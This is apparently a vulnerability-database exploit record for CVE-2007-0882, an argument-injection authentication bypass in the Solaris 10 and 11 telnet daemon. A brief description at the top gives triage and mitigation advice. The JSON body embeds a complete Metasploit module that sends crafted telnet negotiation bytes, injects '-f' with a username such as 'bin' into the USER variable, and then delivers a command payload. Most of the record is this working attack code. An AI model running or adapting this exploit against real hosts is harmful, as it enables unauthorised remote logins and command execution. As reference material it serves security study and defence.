Description
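No description provided by source. According to the module metadata embedded in the record below, this entry covers an argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11 that results in remote authentication bypass, referenced as CVE-2007-0882 (OSVDB 31881, BID 22512). The record's `cvelist` is empty and its CVSS is `0.0` with vector `NONE`, which means the entry is unscored rather than low severity, so triage should key on the CVE reference instead of those fields. Only hosts that expose in.telnetd (TCP port 23 by default) are affected; disabling the telnet service in favour of SSH, or applying the vendor fix, removes the exposure.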
{"href": "https://www.seebug.org/vuldb/ssvid-18011", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-12T00:00:00", "title": "Solaris 10\t 11 Telnet Remote Authentication Bypass", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-18011", "cvelist": [], "description": "No description provided by source.", "viewCount": 3, "published": "2007-02-12T00:00:00", "sourceData": "\n ##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 
2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, "The username to use", "bin" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\t\r\n\t\tprint_status('Setting USER environment variable...')\r\n\t\t\r\n\t\treq = "\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB"\r\n\t\treq << "\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF"\r\n\t\treq << "\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05" \r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << "\\xFF\\xFC\\x25"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << "\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << "\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << "\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = "\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF"\r\n\t\treq << "\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52"\r\n\t\treq << "\\x01\\x2D\\x66" + datastore['USER'] + "\\xFF\\xF0"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\t\r\n\t\tsleep(0.25)\r\n\r\n\t\tsock.put(payload.encoded + "\\n")\r\n\t\tsleep(0.25)\t\r\n\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\n ", "id": "SSV:18011", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T22:10:13", "reporter": "Root", "enchantments": {"score": {"value": 0.7, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2007-0882"]}]}, "exploitation": null, "vulnersScore": 0.7}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 1659709850, "epss": 1678851499}}
{}